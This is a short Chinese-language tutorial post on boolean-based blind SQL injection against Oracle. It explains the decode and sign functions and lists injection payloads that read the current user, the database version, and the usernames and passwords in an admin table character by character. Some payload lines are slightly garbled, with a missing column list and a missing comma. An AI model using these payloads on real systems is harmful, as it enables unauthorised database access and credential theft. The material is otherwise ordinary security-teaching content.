在oracle两种利用布尔型实现盲注入方法
是否存在注入根据页面的返回不同从而判断注入点。
出数据通过注入点构造的SQL语句判断页面是否正常。
decode盲注decode(字段或字段的运算,值1,值2,值3)
这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小select decode(sign(变量1-变量2),-1,变量1,变量2)from dual;—取较小值sign()函数根据某个值是0、正数还是负数,分别返回0、1、-1例如
变量1=10,变量2=20
则sign(变量1-变量2)返回-1,decode解码结果为“变量1”,达到了取较小值的目的。获取当前用户(select user from dual)
获取当前版本(select banner from sys.v_$version where rownum=1)
获取当前admin表的帐号和密码(select username||password from admin)获取字符长度select length(user) from dual —
select from art where id=1 and 6=(select length(user) from dual) —当前用户第一个字母的是否等于s等于返回1否则返回0(select decode(substr(user 1,1),’S’,1,0) from dual)— -获取当前admin表的帐号和密码select from art where id=1 and 1=(select decode(substr((select username||password from admin),1,1),’a’,1,0) from dual)— -
若有收获,就点个赞吧
0 人点赞
